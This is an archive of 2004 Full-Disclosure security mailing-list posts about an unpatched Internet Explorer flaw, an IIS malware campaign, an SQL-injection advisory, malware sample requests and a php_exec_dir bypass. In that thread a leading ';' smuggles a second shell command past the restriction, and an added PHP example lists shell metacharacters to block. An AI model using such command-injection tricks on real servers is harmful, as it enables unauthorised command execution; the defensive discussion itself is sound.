> attacker from usurping privileges on the user's system,
> regulating its operation, compromising data on it, or assuming
> ungranted trust."
>
> What is this gibberish? For the past 10 months the adodb.stream
> object is capable of writing files to the "all important
> customer's" computer. It has real world consequences. It rapes
> their computer. Does it fit into the gibberish custom
> definition? Plain and simple: "A security vulnerability is a
> flaw in a product that makes it infeasible". What kind of
> language is this? Reads like the financial department conjured
> it up.
>
> Disabling scripting won't solve it. Putting sites in one of the
> myriad of "zones" won't solve it. Internet Explorer can
> trivially be fooled into operating in the less than secure
> so-called "intranet zone" and it can be guided there remotely.
>
> What's happening here. Where is the Microsoft representative
> explaining all of this to the shareholders and "customers" they
> so dearly wish to protect. This is unacceptable. Someone must
> be held accountable.

Brian Toovey
Senior Security Analyst
igxglobal




 
[Full-Disclosure] New Auditor security collection announcement

mmoremote-exploit.org
Date: Fri Jun 25 2004 - 17:00:04 CDT


Hi there,

just like to announce, that the new version of the Auditor
security collection (auditor-220604-01B) is available now
at http://www.moser-informatik.ch/?page=products&lang=eng

Thanx for your feedback.

Greetings

Max

Changes in this version:
------------------------
Keyboard mapping is choosable during each boot. ZIP
compression is used, because a bunch of users did not know
bzip2. Booting from a USB CD-ROM device is supported now,
see the new bootusb parameter. New bootmenu and new
resolutions. The whole distro is based on the Linux Kernel 2.6.6.
Includes many new wireless drivers. Smooth support now for
newer Orinoco firmwares. Dragorn's Orinoco monitor mode patch
used. More kernel driver modules included. Better acpi and
power management support. Alsa 1.0.4 used for better sound
support. New hydra version, including a nice gui XHydra.
Modified Wellenreiter to work with all supported cards again.
Kismet scans now all 14 channels as default setting.
The amazing Metasploit framework has been added and IPW2100
centrino driver integration optimized. Nessus plugins upgraded.
Some bugfixing.

What's Auditor security collection?
-----------------------------------
The Swiss Army Knife for security assessments.
A Linux-based, unified platform focused on penetration tests.
The robust power of Open-Source tools without the hassles of
configuring hardware or installing any additional software.
This powerful toolset is started directly from the CD-ROM
without any local installation. Independent of system
hardware, Auditor security collection provides the user with over
300 powerful analysis tools for troubleshooting and securing
networks. Delivering powerful, functional tools in a
user-friendly environment while eliminating complex configuration
was our goal when designing Auditor security collection.

No other commercial or freely available analysis platform
offers an equivalent level of usability with automatic
configuration.



 
[Full-Disclosure] RE: Microsoft and Security

From: Drew Copley (dcopleyeEye.com)
Date: Fri Jun 25 2004 - 17:40:42 CDT


> -----Original Message-----
> From: http-equivexcite.com [mailto:1malware.com]
> Sent: Friday, June 25, 2004 11:53 AM
> To: bugtraqsecurityfocus.com
> Subject: Microsoft and Security

<snip>

> A vulnerability:
>
> http://www.microsoft.com/technet/archive/community/columns/securi
> ty/essays/vulnrbl.mspx
>
> "A security vulnerability is a flaw in a product that makes it
> infeasible - even when using the product properly-to prevent an
> attacker from usurping privileges on the user's system,
> regulating its operation, compromising data on it, or assuming
> ungranted trust."
>
> What is this gibberish? For the past 10 months the adodb.stream
> object is capable of writing files to the "all important
> customer's" computer. It has real world consequences. It rapes
> their computer. Does it fit into the gibberish custom
> definition? Plain and simple: "A security vulnerability is a
> flaw in a product that makes it infeasible". What kind of
> language is this? Reads like the financial department conjured
> it up.

LOL. Very well said...

I think the point is not being pushed home, though.

Ten month old vulnerability. Common denominator for all of these
attacks. This latest one is using the same flaw we saw in one
this past Spring. It is not the latest zero day, according to
Symantec's latest paper.

In fact, even they state up front "to deploy the workaround for
the adodb stream issue". Workaround.

This adodb stream issue - found by Jelmer - is unfixed by Microsoft.

I do not know why. I suppose it fits into their competitive "motif"
somehow. They like to do these sorts of things.

It is a "bar lowering" vulnerability. Otherwise, these other attacks
would not work. They never would have worked.

The workaround kill bits the activex. There is no reason for it,
not enough of one. I think some IIS systems may use it. I am sure
it provides some sort of piece in their competitive marketing
strategy. But, kill the dying horse already.

Here is the free fix I made (ten months ago, re-released):
http://www.eeye.com/html/research/alerts/AL20040610.html

There is a reg file or an exe file. Whichever one prefers. We
find the exe file is most handy for doing mass fixes across
corporate networks.

Clue, people: Likely, you have been affected by one of these
holes. If you are an administrator, your domain has almost
surely been affected.

There is a huge market for identities. Do not be naive.

>
> Disabling scripting won't solve it. Putting sites in one of the
> myriad of "zones" won't solve it. Internet Explorer can
> trivially be fooled into operating in the less than secure so-
> called "intranet zone" and it can be guided there remotely.
>
> What's happening here? Where is the Microsoft representative
> explaining all of this to the shareholders and "customers" they
> so dearly wish to protect. This is unacceptable. Someone must
> be held accountable.
>
>
> --
> http://www.malware.com


 
[Full-Disclosure] Disassembled Source for latest Backdoor-axj?

From: Burnes, James (james.burnesgwl.com)
Date: Fri Jun 25 2004 - 18:45:32 CDT


Does anyone have a good disassembled source listing for the latest
backdoor-axj? Of course if you have the original commented source, I'll
take that also. ;-)

thx



 
Re: SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Nasir Ghaznavi (nasirghaznavigmail.com)
Date: Fri Jun 25 2004 - 19:04:49 CDT


As of now the server, which was a Russian server, has been taken down.

Nasir Ghaznavi

On Fri, 25 Jun 2004 10:36:08 +0100, Duncan Hill
<dhill+fulldisccricalix.net> wrote:
>
> On Friday 25 June 2004 07:05, Peter Kruse might have typed:
>
> > When the javascript runs it will try to redirect you to a remote server
> > http://217.107.218.147. This is where the MSITS.EXE and the javascripts are
> > stored. As far as I know they do not reside on the compromised IIS servers,
> > but simply pull the payload from the remote host. Meanwhile the
> > host is no longer available.
>
> I've noticed that several ISPs appear to have null-routed that IP. I can't
> get past our ISP's upstream right now - trace just dies.
>
>



 
RE: [Full-Disclosure] Microsoft and Security

http-equivexcite.com
Date: Fri Jun 25 2004 - 16:48:14 CDT


volunteer as an expert witness when the negligence lawsuits
finally arise :)

and you?

"Burnes, James" <james.burnesgwl.com> said:

> One word,
>
> m-o-n-o-p-o-l-y
>
> And what are you going to do about it, punk?
>
>
>
> > -----Original Message-----
> > From: full-disclosure-adminlists.netsys.com
> > [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of http-equivexcite.com
> > Sent: Friday, June 25, 2004 10:02 AM
> > To: bugtraqsecurityfocus.com
> > Cc: NTBugtraqlistserv.ntbugtraq.com; full-disclosurelists.netsys.com
> > Subject: [Full-Disclosure] Microsoft and Security
> >
> >
> >
> > Where is Microsoft now "protecting their customers" as they love
> > to bray? Should not someone in authority of this public company
> > step forward and explain themselves at this time?
> >
> > All of a sudden panic is being created across the WWW with "IIS
> > Exploit Infecting Web Site Visitors With Malware", "Mysterious
> > Attack Hits Web Servers", "Researchers warn of infectious Web
> > sites" all stemming from all news accounts from an
> > unpatched "problem" with Internet Explorer now two weeks old and
> > counting, which in fact in reality stems from 10 months ago,
> > that being the adodb.stream safe for scripting control with
> > write capabilities.
> >
> > What exactly is being done about this? Nothing. What do
> > multiple billions of dollars buy you today? Nothing. However for
> > $20 million you can almost fly to the moon.
> >
> > Someone ought to step forward and explain what exactly is
> > happening at this public company. The great "protector of their
> > customers". One might even suggest that their entire "security"
> > mandate be re-examined. What exactly do they consider a
> > vulnerability? Something that suits them or something that's
> > cost-effective to fix. So what, a few people lose their
> > identities, have a few dollars extracted from their bank
> > accounts, have their home pages reset, we'll fix it when it
> > suits us as we have to be on budget this quarter. The Big Boss
> > says $40 billion isn't enough this year.
> >
> > A vulnerability:
> >
> > http://www.microsoft.com/technet/archive/community/columns/security/essays/vulnrbl.mspx
> >
> > "A security vulnerability is a flaw in a product that makes it
> > infeasible - even when using the product properly - to prevent an
> > attacker from usurping privileges on the user's system,
> > regulating its operation, compromising data on it, or assuming
> > ungranted trust."
> >
> > What is this gibberish? For the past 10 months the adodb.stream
> > object is capable of writing files to the "all important
> > customer's" computer. It has real world consequences. It rapes
> > their computer. Does it fit into the gibberish custom
> > definition? Plain and simple: "A security vulnerability is a
> > flaw in a product that makes it infeasible". What kind of
> > language is this? Reads like the financial department conjured
> > it up.
> >
> > Disabling scripting won't solve it. Putting sites in one of the
> > myriad of "zones" won't solve it. Internet Explorer can
> > trivially be fooled into operating in the less than secure so-
> > called "intranet zone" and it can be guided there remotely.
> >
> > What's happening here? Where is the Microsoft representative
> > explaining all of this to the shareholders and "customers" they
> > so dearly wish to protect. This is unacceptable. Someone must
> > be held accountable.
> >
> >
> > --
> > http://www.malware.com

--
http://www.malware.com



 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: VeNoMouS (venomgen-x.co.nz)
Date: Fri Jun 25 2004 - 20:34:44 CDT


Dude, do you even know what the php_exec_dir patch is? It's a patch so you don't
have to turn safe mode on, which disables a bunch of shit that you need, so
the patch was a workaround to simply stop you executing programs.

Here's a hint: learn about the product before you spam a mailing list. I see 5
posts from you asking the exact same question 2 hrs apart from each other;
you think you could've googled in that time or perhaps fixed your mail
queue?

Either or, stop being so fucking lazy.

----- Original Message -----
From: "npguy" <npguywebsurfer.com.np>
To: "VeNoMouS" <venomgen-x.co.nz>; <full-disclosurelists.netsys.com>
Sent: Friday, June 25, 2004 2:47 AM
Subject: Re: [Full-Disclosure] flaw in php_exec_dir patch

> Is your safe mode on? What's your platform?
> Give more details!
>
> On Wednesday 23 June 2004 07:05 am, VeNoMouS wrote:
>> Found an issue last night while testing the php_exec_dir patch.
>>
>> If you do the following:
>>
>> $blah=`ps aux`;
>> echo nl2br($blah);
>>
>> php_exec_dir will block the call if you have set the exec_dir param in php
>> or apache.
>>
>> Anyway.... if you do this:
>>
>> $blah=`;ps aux`;
>> echo nl2br($blah);
>>
>> it bypasses the exec block and executes the ps due to the ';', as bash
>> interprets ';' as a new cmd. I've emailed the author but no response.
>
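
An added example, not code from the php-exec-dir patch or from the poster: it contrasts a prefix-only rewrite of the command string (a constructed model of the behaviour described above, which the leading ';' slips past because the shell sees two commands) with a validator that refuses shell metacharacters and resolves the program inside exec_dir before anything runs. The temp directory, the stub "ps" program and the function names are assumptions made for the demo.

```php
<?php
// Added example (not the php-exec-dir patch's code). Assumes the restriction
// works by forcing the program name under exec_dir; the directory layout and
// the stub program below are constructed for the demo.

// Constructed model of a prefix-only rewrite: the command string is made to
// start with exec_dir. For ';ps aux' the shell is handed
// "/exec/dir/;ps aux", i.e. a failing first command followed by a free 'ps'.
function prefix_only_rewrite(string $cmd, string $exec_dir): string
{
    return rtrim($exec_dir, '/') . '/' . ltrim($cmd);
}

// Stricter validator: returns the quoted command line to hand to the shell,
// or null when the request must be refused.
function build_exec_dir_command(string $cmd, string $exec_dir): ?string
{
    // Anything the shell would treat as more than a list of plain words is
    // refused outright: separators, redirections, substitutions, globs, quotes.
    if (preg_match('/[;&|<>`$(){}\[\]*?~\\\\\'"\n\r]/', $cmd) === 1) {
        return null;
    }
    $words = preg_split('/\s+/', trim($cmd), -1, PREG_SPLIT_NO_EMPTY);
    if (count($words) === 0) {
        return null;
    }
    $prog = array_shift($words);
    // The program must be a bare file name: no directory parts, no dot-files.
    if ($prog !== basename($prog) || $prog[0] === '.') {
        return null;
    }
    // Resolve both the directory and the program, so a symlink inside
    // exec_dir that points elsewhere fails the containment check.
    $base = realpath($exec_dir);
    $full = $base === false ? false : realpath($base . DIRECTORY_SEPARATOR . $prog);
    if ($base === false || $full === false
        || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($full) || !is_executable($full)) {
        return null;
    }
    // Every argument is quoted individually, and the resolved absolute path
    // is what runs, not whatever the caller typed.
    $quoted = array_map('escapeshellarg', $words);
    array_unshift($quoted, escapeshellarg($full));
    return implode(' ', $quoted);
}

// Demo: a throwaway exec_dir holding one permitted program (a stub "ps").
$execDir = sys_get_temp_dir() . '/execdir_demo_' . getmypid();
mkdir($execDir, 0700);
file_put_contents($execDir . '/ps', '#!/bin/sh' . "\n" . 'echo "stub ps called with: $*"' . "\n");
chmod($execDir . '/ps', 0755);

$requests = ['ps aux', ';ps aux', 'ps aux; id', '../../bin/ps aux'];
foreach ($requests as $request) {
    $naive = prefix_only_rewrite($request, $execDir);
    $safe  = build_exec_dir_command($request, $execDir);
    echo "request:     ", var_export($request, true), "\n";
    echo "prefix-only: ", $naive, "\n";   // for ';ps aux' the shell sees two commands
    echo "validated:   ", $safe ?? 'REFUSED', "\n";
    if ($safe !== null) {
        echo "output:      ", trim((string) shell_exec($safe)), "\n";
    }
    echo "\n";
}

unlink($execDir . '/ps');
rmdir($execDir);
```

Only the plain 'ps aux' request survives the validator; the three others are refused before any shell is involved.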



 
[Full-Disclosure] Microsoft and Security

http-equivexcite.com
Date: Fri Jun 25 2004 - 10:41:04 CDT


Where is Microsoft now "protecting their customers" as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?

All of a sudden panic is being created across the WWW with "IIS
Exploit Infecting Web Site Visitors With Malware", "Mysterious
Attack Hits Web Servers", "Researchers warn of infectious Web
sites" all stemming from all news accounts from an
unpatched "problem" with Internet Explorer now two weeks old and
counting, which in fact in reality stems from 10 months ago,
that being the adodb.stream safe for scripting control with
write capabilities.

What exactly is being done about this? Nothing. What do
multiple billions of dollars buy you today? Nothing. However for
$20 million you can almost fly to the moon.

Someone ought to step forward and explain what exactly is
happening at this public company. The great "protector of their
customers". One might even suggest that their entire "security"
mandate be re-examined. What exactly do they consider a
vulnerability? Something that suits them or something that's
cost-effective to fix. So what, a few people lose their
identities, have a few dollars extracted from their bank
accounts, have their home pages reset, we'll fix it when it
suits us as we have to be on budget this quarter. The Big Boss
says $40 billion isn't enough this year.

A vulnerability:

http://www.microsoft.com/technet/archive/community/columns/security/essays/vulnrbl.mspx

"A security vulnerability is a flaw in a product that makes it
infeasible – even when using the product properly—to prevent an
attacker from usurping privileges on the user's system,
regulating its operation, compromising data on it, or assuming
ungranted trust."

What is this gibberish? For the past 10 months the adodb.stream
object is capable of writing files to the "all important
customer's" computer. It has real world consequences. It rapes
their computer. Does it fit into the gibberish custom
definition? Plain and simple: "A security vulnerability is a
flaw in a product that makes it infeasible". What kind of
language is this? Reads like the financial department conjured
it up.

Disabling scripting won't solve it. Putting sites in one of the
myriad of "zones" won't solve it. Internet Explorer can
trivially be fooled into operating in the less than secure so-
called "intranet zone" and it can be guided there remotely.

What's happening here? Where is the Microsoft representative
explaining all of this to the shareholders and "customers" they
so dearly wish to protect. This is unacceptable. Someone must
be held accountable.

--
http://www.malware.com



 
Re: [Full-Disclosure] IE exploit runs code from graphics?

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sat Jun 26 2004 - 01:22:08 CDT


> files (.CHM) from some web site, causing the HTML code inside the .CHM
> to be run in the "My Computer" security zone. Typically (like all but
> one of _dozens and dozens_ of these I've seen) the "inner" HTML run

This is one of the _dozens and dozens_ of reasons to use Mozilla on untrusted sites and use IE to access internal websites if they depend on some IE features, but set the default browser to Mozilla so that whenever the user clicks something it opens in Mozilla.

> That is hardly the same thing as "embedded code hidden in graphics on
> Web pages", but I can easily imagine a naïve journalist getting
> confused over such technical issues or a company representative
> hankering for some media exposure over-selling the seriousness or
> novelty of what they "discovered"...

and these are the people who raise the script kiddies to "elite hackers!"

-aditya



 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sat Jun 26 2004 - 01:25:56 CDT


> I can only second Charles' and Isi's statements.... I sent a mail
> earlier this morning to the list, and it was bounced back to me by
> different engines. I made my case worse by underlining the fact that
> the body of the messages sent under my sp**fed identity were either
> advertising P*RN sites, or were plain SP*M for any kind of products..
> the full and correct spelling of P*RN and SP*M triggered also some
> sites to reject straight away my message ;-). Life is not easy, and it
> seems we ain't seen anything yet... oh well...:-)

This is where you can see the deficiencies of SMTP and of the admins of the sites receiving the mail.

-aditya


 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sat Jun 26 2004 - 01:21:58 CDT


> I can also confirm that this is continuing from one of my many email addresses also.

So now we know that not only are the spammers slime and the people who do "organised crime", but they are racists.

-aditya

I know this has nothing to do with security, so please send mail to my personal address and *NOT* to the list.



 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: npguy (npguywebsurfer.com.np)
Date: Sat Jun 26 2004 - 03:30:41 CDT


Hi venom,

Which patch are you talking about?
Well, did you ever try

http://www.google.com/search?q=php_exec_dir+site:www.php.net&l=en

There are quite a few entries which tell nothing except similar to your post.
Well, give it a try in the php-internals archive. You just get nothing. Actually, which
patch are you talking about? It was never issued officially and was not around
in the communities. You are talking about some unknown directives that were
never intended to be used. People often make use of Apache directives to
allow non-safe mode for their trusted scripts; that is what I see as a good
solution for the time being. Anyway, if it's a cool patch I am interested! Give
me some references.

> Here's a hint: learn about the product before you spam a mailing list. I see 5
> posts from you asking the exact same question 2 hrs apart from each other

Well, I never posted and saw it in the list; you might be wrong.
Actually there were some postings about this patch's existence. Did you check
that?

On Saturday 26 June 2004 07:19 am, VeNoMouS wrote:
> Dude, do you even know what the php_exec_dir patch is? It's a patch so you don't
> have to turn safe mode on, which disables a bunch of shit that you need, so
> the patch was a workaround to simply stop you executing programs.
>
> Here's a hint: learn about the product before you spam a mailing list. I see 5
> posts from you asking the exact same question 2 hrs apart from each other;
> you think you could've googled in that time or perhaps fixed your mail
> queue?
>
> Either or, stop being so fucking lazy.
>
>
> ----- Original Message -----
> From: "npguy" <npguywebsurfer.com.np>
> To: "VeNoMouS" <venomgen-x.co.nz>; <full-disclosurelists.netsys.com>
> Sent: Friday, June 25, 2004 2:47 AM
> Subject: Re: [Full-Disclosure] flaw in php_exec_dir patch
>
> > Is your safe mode on? What's your platform?
> > Give more details!
> >
> > On Wednesday 23 June 2004 07:05 am, VeNoMouS wrote:
> >> Found an issue last night while testing the php_exec_dir patch.
> >>
> >> If you do the following:
> >>
> >> $blah=`ps aux`;
> >> echo nl2br($blah);
> >>
> >> php_exec_dir will block the call if you have set the exec_dir param in
> >> php or apache.
> >>
> >> Anyway.... if you do this:
> >>
> >> $blah=`;ps aux`;
> >> echo nl2br($blah);
> >>
> >> it bypasses the exec block and executes the ps due to the ';', as bash
> >> interprets ';' as a new cmd. I've emailed the author but no response.


 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: VeNoMouS (venomircwhores.co.nz)
Date: Fri Jun 25 2004 - 20:39:08 CDT


For real? I find it on the first line when I search for it.

http://www.google.co.nz/search?hl=en&ie=UTF-8&q=php-exec-dir+patch&meta=

PHP patch exec_dir
... the archive, step into the directory created: $ cd
/path/to/directory/with/php-xyz
Now apply the patch: $ zcat /path/to/file/php-exec-dir.xyz.patch.gz | patch
...
kyberdigi.cz/projects/execdir/english.html - 16k - 24 Jun 2004 - Cached -
Similar pages

----- Original Message -----
From: "Tim" <timabenath.de>
To: <full-disclosurelists.netsys.com>
Sent: Friday, June 25, 2004 8:05 PM
Subject: Re: [Full-Disclosure] flaw in php_exec_dir patch

> Hello List,
>
>> > Found a issue last night while testing php_exec_dir patch
>
> Where is this patch from? I was not able to locate it with a Google
> search.


 
[Full-Disclosure] "Sample" not running but preventing Win2k from Shutdown

From: Marcel Krause (marcel_kweb.de)
Date: Sat Jun 26 2004 - 03:58:14 CDT


Hi guys,

I was fishing for some nice MSIE "plugins" on some porn sites and
found a mysterious one. It does not appear anywhere, neither in my
Firewall nor as a toolbar, and there is no new process running on
the sandbox machine. But whenever I try to shut it down or reboot
it, an application called "sample" does not want to terminate
voluntarily. As said before, there is no such app in the process
list before shutting down, and there is no unknown sample*.* file
on any of the sandbox's hard disks. Does anyone know this "sample"?

Yours,
Marcel



 
RE: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: X iniT (x1n1tyahoo.com)
Date: Sat Jun 26 2004 - 04:55:20 CDT


The good folks at ClamAV updated
their DB very fast...

Your submission: 3822
Date: 09-06-2004 15:03:10 +0200
Original Filename: MSCDEX.EXE
Reported virus name: Unknown Virus/worm/trojan/spyware
Has been reviewed by: Tomasz Papszun

Submission added: Yes (as Worm.AntiQFX.A)
<<<<<<<<<<--CHECK IT OUT :)

The reviewer had the following note:
We are sorry for the delay!!
-------------

Thank you for taking time to submit samples. Your help
is very precious
to the ClamAV Users Community.

Best regards,
The VirusDB maintainers



 
[Full-Disclosure] ZH2004-13SA (security advisory): Sql Injection in Help Desp Pro 2.0

From: D'Amato Luigi (luigidamato77yahoo.it)
Date: Sat Jun 26 2004 - 05:59:08 CDT


26/06/2004

ZH2004-10SA (security advisory): Sql Injection in Help Desp Pro 2.0
Date of discovery: 1 June 2004

Date of release: 26 June 2004

Name: Help Desk Pro

Vulnerable Version: 2.0 unpatched

Vulnerability: Sql Injection

Author: D'Amato Luigi from Zone-h Security Labs -
securitywirelesszone-h.it - adminsecuritywireless.info

Vendor: http://www.websoft.it/

Description

**********
Zone-H Security Team has discovered a security flaw in Help Desk Pro. This
vulnerability could allow malicious
attackers to bypass the authentication mechanism without having an account.

Detail
********************************************
Due to an improper login validation in the login page it is possible to
bypass the authentication mechanism

Solution
**********
The vendor has been contacted and has released a patch.

---

D'Amato Luigi from Zone-h Security Labs -
securitywirelesszone-h.it -
adminsecuritywireless.info
Admin Security Wireless
http://www.securitywireless.info

http://www.zone-h.org/en/advisories/read/id=4891/



 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: lsi (stuartcyberdelix.net)
Date: Sat Jun 26 2004 - 06:34:25 CDT


On 26 Jun 2004 at 11:51, Aditya, ALD [ Aditya Lalit Deshmukh ] wrote:

> > I can also confirm that this is continuing from one of my many email addresses also.
>
> So now we know that not only are the spammers slime and the people who do "organised crime", but they are racists.

> i know this has nothing to do with security so please send mail on my personal address and *NOT* to the list

One of the reasons I posted was because although the spam is not a
vulnerability in itself, it is evidence which leads back to folks who
have done a lot of damage (see: Sobig) -- and who knows what else.

It has to do with security because we're getting a better picture of
what these people look like.

For instance, it also appears they are German, or Dutch, or they have
German or Dutch connections. And they might even live in a Turkish
area. Etc ...

Some people mailed me and said this is happening all the time to
everyone - I can't correlate that as I only saw a few bounces from
one ISP. An automated and/or large-scale joe-job makes a mess. I'm
not seeing constant traffic like this, so I conclude it's not occurring
constantly. Maybe one address gets used to spam a range of
addresses on one ISP. This would keep the bounces down (fits the
observed circumstances of just a few bounces) ... and would suggest
the purpose is to spread the hatemail, not defame the spoofed sender
(switching addresses would mean the mail comes from someone else,
diluting any defamatory effect).

I got two bounces. The original recipients were louisedircon.co.uk
and nicoladircon.co.uk (my original message shows netscalibur, who
are apparently providing some kind of backend service for dircon).

Note alphabetic proximity of recipients.. L and N

The bot was going through a list ..... but as that's all the bounces
I saw, I conclude addresses other than my own were used to spam the
rest of the alphabet, and other ISPs.

So that's a lot of people who have had their names associated with
that stuff. Spamming might be a crime in some countries, but
tarnishing the names of others is almost certainly a crime in all
countries. When they finally get arrested it will be 200 million
counts of spamming, and also, 50000 counts of defamation (or whatever
crime it actually is..) ... pesky automated solutions!

RISK: When you program a robot to commit a crime, you are asking for
trouble.

Stuart

---
Stuart Udall
stuart atcyberdelix.dot net - http://www.cyberdelix.net/

---
 * Origin: lsi: revolution through evolution (192.168.0.2)



 
[Full-Disclosure] ZH2004-13SA (security advisory): Sql Injection in Help Desp Pro 2.0 (Corrected version)

From: D'Amato Luigi (adminsecuritywireless.info)
Date: Sat Jun 26 2004 - 06:35:27 CDT


06/26/2004
 
26/06/2004

ZH2004-10SA (security advisory): Sql Injection in Help Desp Pro 2.0
Discovered: June 1st 2004

Vendor contacted: June 1st 2004
Published: June 26th 2004

Title: Help Desk Pro

Vulnerable versions :2.0 unpatched

Type: Sql Injection

Author: D'Amato Luigi from Zone-h Security Labs - securitywirelesszone-h.it - adminsecuritywireless.info

Vendor: http://www.websoft.it/

Description

**********
Zone-H Security Team has discovered a security flaw in Help Desk Pro. This vulnerability could allow malicious
attackers to bypass the authentication mechanism without having an account.

Detail

********************************************

Due to an improper login validation in the login page it is possible to bypass the authentication mechanism

Solution

**********

The vendor has been contacted and has released a patch

---

D'Amato Luigi from Zone-h Security Labs -
securitywirelesszone-h.it -
adminsecuritywireless.info
Admin Security Wireless
http://www.securitywireless.info
 
http://www.zone-h.org/en/advisories/read/id=4891/



 
Re: [Full-Disclosure] Microsoft and Security

From: Georgi Guninski (guninskiguninski.com)
Date: Sat Jun 26 2004 - 08:27:48 CDT


On Fri, Jun 25, 2004 at 03:38:56PM -0600, Burnes, James wrote:
> One word,
>
> m-o-n-o-p-o-l-y
>
> And what are you going to do about it, punk?
>

please don't underestimate the power of punks.
 



 
Re: [Full-Disclosure] "Sample" not running but preventing Win2k fromShutdown

From: Marcel Krause (marcel_kweb.de)
Date: Sat Jun 26 2004 - 08:23:12 CDT


Hi Steve!

> So what are you doing right now, killing the process via the Task
> Manager?

No. I booted Linux and made a backup of the hdd. Now I'm waiting for
some tips about how to extract the sample program for later analysis.
If no one has any ideas, I'll overwrite it with a clean image.

> Hmmm I am glad I am not in a commercial environment
> where I am forced to use MSIE.

In a commercial environment, you wouldn't go "fishing for [...]
plugins on some porn sites", would you?

Yours, Marcel



 
[Full-Disclosure] multiple scanning engines

From: RandallM (randallmfidmail.com)
Date: Sat Jun 26 2004 - 10:26:41 CDT


Hi,

I'm looking for something that can utilize multiple scanning engines to place
above our mail servers. Any suggestions?

 

thank you

Randall M



 
[Full-Disclosure] Wanted: Sasser executable and derivatives

From: The Central Scroutinizer (scroutinizerbeeb.net)
Date: Sat Jun 26 2004 - 11:50:00 CDT


Hi again,

Would you please send any executables direct to me, zipped and encoded with a password in order to get through my e-mail anti virus software,

Many thanks

CS



 
[Full-Disclosure] Wanted: Sasser executable and derivatives

From: The Central Scroutinizer (scroutinizerbeeb.net)
Date: Sat Jun 26 2004 - 11:40:03 CDT


Hi,

I am intending to study Sasser and its derivatives and am after executables in order to disassemble and reconstruct back to source.

As I say this is for study purposes only :)

I am looking for :-
    avserve.exe - Sasser.A
    avserve2.exe - Sasser.B, plus any xxx_up.exe files
    Sasser.C executable
    skynetave.exe - Sasser.D
    lsasss.exe - Sasser.E
    napatch.exe - Sasser.F
    Sasser.G executable

Either the compacted executables or decompacted or both.

Many thanks in advance,

The Central Scroutinizer



 
RE: [Full-Disclosure] "Sample" not running but preventing Win2k from Shutdown

From: transientimages (roottransientimages.com)
Date: Sat Jun 26 2004 - 16:14:39 CDT


I can state "Me too" on this:

Troubleshooting \ Analysis
--------------------------
pids, tlist, pulist do not show this name as an executed process, but when I
go to shutdown, the "Sample" process needs to be terminated before shutdown

Scans
-----
NAV and Ad-Aware report nothing
Secondary scanning with Trend Housecall
Netstat -ao reports nothing bad or remote
Blackice reports nothing going out

Running
        WinXP SP1
        MS Updates [Shavlik \ MS04-xxx patched]
        NAV 2003 Current Sigs
        Ad Aware Latest Sigs
        Blackice 3.6 cci

Weird : suspect a 0day IE exploit on one of the more dodgy security sites I
visit....

Anyone else?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Marcel Krause
Sent: Saturday, June 26, 2004 4:58 AM
To: Full Disclosure
Subject: [Full-Disclosure] "Sample" not running but preventing Win2k from
Shutdown

Hi guys,

I was fishing for some nice MSIE "plugins" on some porn sites and
found a mysterious one. It does not appear anywhere, neither in my
Firewall nor as a toolbar, and there is no new process running on
the sandbox machine. But whenever I try to shut it down or reboot
it, an application called "sample" does not want to terminate
voluntarily. As said before, there is no such app in the process
list before shutting down, and there is no unknown sample*.* file
on any of the sandbox's hard disks. Does anyone know this "sample"?

Yours,
Marcel



 
Re: [Full-Disclosure] "Sample" not running but preventing Win2k from Shutdown

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Sat Jun 26 2004 - 18:29:38 CDT


Marcel Krause <marcel_kweb.de> wrote:

> I was fishing for some nice MSIE "plugins" on some porn sites and
> found a mysterious one. It does not appear anywhere, neither in my
> Firewall nor as a toolbar, and there is no new process running on
> the sandbox machine. But whenever I try to shut it down or reboot
> it, an application called "sample" does not want to terminate
> voluntarily. As said before, there is no such app in the process
> list before shutting down, and there is no unknown sample*.* file
> on any of the sandbox's hard disks. ...

Jeeeez...

The lameness exhibited here just keeps getting more and more
unbelievable.

What in the world possessed you to "go fishing" for something that you
are clearly entirely inadequate to handle? How you could even consider
doing this without, obviously, the most basic grasp of modern malware
techniques is astounding.

Have you not heard of process injection?

Or even "browser helper objects"?

And that you would try this on a machine that is clearly not suitably
prepared for file system, registry and process "diff analysis" is only
more astounding than that you are gormless enough to admit to all those
inadequacies by posting about it here...

> ... Does anyone know this "sample"?

Not necessarily that specific one, but it is almost certainly very like
many others that have been using process injection techniques or the
BHO method of "injecting" themselves into Explorer...

If you tell us the URL you got it from, someone who can spell "clue" may
spend two minutes working it out for you though...

Regards,

Nick FitzGerald

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] multiple scanning engines

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Sat Jun 26 2004 - 18:29:38 CDT


"RandallM" <randallmfidmail.com> wrote:

> I am looking for something that can utilize multiple scanning engines to
> place above our mail servers. Any suggestions?

Precisely how is this a security vulnerability disclosure issue?

Securityfocus has a focus-virus list and there are many other fora
around the web for discussing "whose antivirus is best" type issues...

Please, no-one else reply to this _on list_.

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] "Sample" not running but preventing Win2k from Shutdown

From: Aditya, ALD [ Aditya Lalit Deshmukh ] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sat Jun 26 2004 - 20:09:08 CDT


> I was fishing for some nice MSIE "plugins" on some porn sites and
> found a mysterious one. It does not appear anywhere, neither in my
